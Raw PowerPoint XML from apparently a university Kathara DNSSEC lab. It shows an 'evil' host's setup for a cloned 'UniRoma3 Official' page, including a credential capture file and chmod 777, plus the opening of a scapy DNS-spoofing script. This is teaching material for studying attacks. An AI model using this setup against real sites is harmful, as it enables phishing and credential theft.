                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/www/html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>echo "--- DATABASE CREDENZIALI EVIL ---" &gt; /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>www-data:www-data</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 777 /var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rm -f /var/www/html/index.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>apache2ctl start</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tail -f /dev/null</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F2A1518-8AE0-9A6A-0CEF-FD774F396714}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-1652" y="2644"/>
              <a:ext cx="2215" cy="228"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil.startup</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C87D4AC-9CA2-40E4-D04E-B4B0E1F214FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC85C11E-DE78-9788-E7F2-C46657B8EB8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F530052-8002-DC64-1427-0A055FF726B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34512148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8ABF6F-8E0F-03FD-B397-501A61736BEB}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22784B9E-A263-B19E-8BA1-CB58A3CB0769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1817319" y="1910467"/>
            <a:ext cx="8557361" cy="3037065"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BDEA8F0-DFB7-C229-5CB6-E7FB33E72B67}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;html&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;head&gt;&lt;title&gt;UniRoma3 Official&lt;/title&gt;&lt;/head&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;pre&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ATTENZIONE: SITO CLONE (EVIL)!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>...</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/pre&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{738FC324-28E5-CF75-2385-A1DA9EA90735}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2609" cy="97"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/evil/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>index.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8431E678-E8C6-1246-2409-FE8017D99D59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C036AE1-DC91-A60C-B4E7-AF2E04F86D52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A219CD0-4D09-23DC-FDF9-A3F76AA9D7D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20486345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9F0506-F609-BD11-5F78-6411304B9662}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF1CD7B4-B239-F725-D3E2-9B90E7ED30D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF53B5A2-426F-039D-B51C-54B0F49E5784}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>scapy.all</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> import DNSQR , DNS , IP , UDP , DNSRR , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>send</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ,sniff , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sendp</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>EVIL_IP = "210.0.3.50"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
